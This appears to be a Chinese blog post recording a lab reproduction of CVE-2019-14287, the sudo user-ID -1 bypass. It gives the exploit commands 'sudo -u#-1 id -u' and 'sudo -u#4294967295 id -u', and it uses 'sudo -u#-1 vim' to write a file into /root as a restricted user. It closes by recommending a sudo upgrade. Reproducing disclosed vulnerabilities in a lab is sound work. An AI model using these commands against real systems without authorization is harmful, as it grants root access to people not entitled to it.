avatar

CVE-2019-14287复现记录

日常睡前刷资讯消息

前两天16号晚上十二点多,日常刷资讯的时候,忽然瞅见了一篇文章说受限用户可以运行root命令
普通用户执行root指令,这不就权限绕过了嘛~
是个好东西

这个漏洞是由苹果信息安全部门的大佬发现的,提供了漏洞的利用方式

sudo -u#-1 id -u
sudo -u#4294967295 id -u

这两个方式都可以
下面将本人复现记录放一下

动手复现

先添加一个账号tina

useradd tina
passwd tina
然后在 /etc/sudoers这个文件中配置权限

接着 su tina 切换用户

尝试一下列出root目录内容

然后利用漏洞看一下

然后 试一下写入一个文件

可以看到是无法写入的

利用漏洞写看一下
sudo -u#-1 vim /root/xuzhiting.txt


可以看到已经在root目录下写入了我们的文件

我们还是修复一下下漏洞吧

修复该咋个处理?
这个漏洞修复可以通过升级sudo版本来完成

文章部分内容参考此处:https://www.sudo.ws/alerts/minus_1_uid.html

要是感觉不错的话,就留个言评论一下下呀,欢迎各位大哥指正
文章作者: MarxCBR
文章链接: https://www.marxcbr.cn/archives/be5b30a1.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 MarxCBR的小屋
打赏
  • 微信
    微信
  • 支付宝
    支付宝

评论
2